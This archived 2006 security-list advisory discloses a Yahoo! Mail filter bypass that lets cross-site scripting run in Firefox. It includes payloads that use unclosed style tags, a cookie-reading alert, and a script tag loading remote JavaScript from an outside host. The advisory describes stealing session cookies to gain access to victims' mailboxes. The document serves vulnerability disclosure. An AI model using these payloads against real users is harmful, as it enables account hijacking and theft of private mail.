lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <4497.68.20.211.67.1153969569.squirrel@www.morx.org>
Date: Thu, 27 Jul 2006 03:06:09 -0000 (GMT)
From: simo@...x.org
To: full-disclosure@...ts.grok.org.uk,
 bugtraq@...urityfocus.com
Cc: 
Subject: Yahoo! Mail + Firefox Filter Bypass

Title: Yahoo! Mail Filter Bypass

Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org>
Discovered: january 2006
published: 26 july 2006
MorX Security Research Team
http://www.morx.org
http://www.morx.org/yahoo-firefox-bypass.txt

Service: Webmail

Vendor: Yahoo mail, and possibly others

Vulnerability: Filter bypass / Cross Site Scripting

Severity: Medium/High

Tested to be vulnerable on: FireFox 1.5.0.4

not vulnerable: Microsoft IE 6.0, Opera 8.54

Details:

few months ago i have published a vulnerability affecting Yahoo mail with
MS IE, where yahoo mail filter failed to detect script attributes in
combination with the style attribute as a tag,

the combination code was:
<STYLE onload="alert(document.cookie)"> </STYLE>

few days later yahoo patched the above combination

so now if you try to send your self that code, you will see that yahoo
filters it this way

<style onfiltered="alert(document.cookie)"> </style>

this is not a good way of filtering, since yahoo filtered only the
"onload" attribute

few days later i received some emails asking how a similar
bypass-combination can be executed on other browsers such as firefox since
that one worked only on IE, after making some tests i realised that
firefox will execute any js code proceeded by <style as a tag

example:

<style <script>alert('a')</script>
or
<style <body onload="alert('a')">

note that <style must be left open, if you close it with </style> firefox
wont execute the js code

in fact the first combination will not be filtered by yahoo mail, usualy
yahoo filters <script> and </script> but if proceeded by the <style tag it
wont be filtered at all which will lead to script execution on firefox and
leads to user account compromise

exploit code example

<style <script>alert(document.cookie)</script>

<style <script SRC=http://www.morx.org/xss.js></script>

as you can see here from my yahoo mail message source code, the code is
left unfiltered:


<div id=message>


<!-- type = text -->


<style <script SRC=http://www.morx.org/xss.js></script><BR>


Impact:

an attacker can send the unfiltered code as an html email to a yahoo mail
user with FireFox. Once the victim opens the malicious email the
javascript content will be executed in the the target browser. This will
allow user's session cookie theft, giving the attacker access to the
victim mail box for about 24 hours (until the cookie expires)

Screen captures:

www.morx.org/yahoo-firefox-bypass.jpg

workaround:

Switch to another browser, or disable script execution until a patch is
released

Disclaimer:

this entire document is for eductional, testing and demonstrating purpose
only. Modification use and/or publishing this information is entirely on
your OWN risk. The exploit code is to be used on your OWN email account. I
cannot be held responsible for any of the above. comments or additional
questions feel free to email me at simo_at_morx_org

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ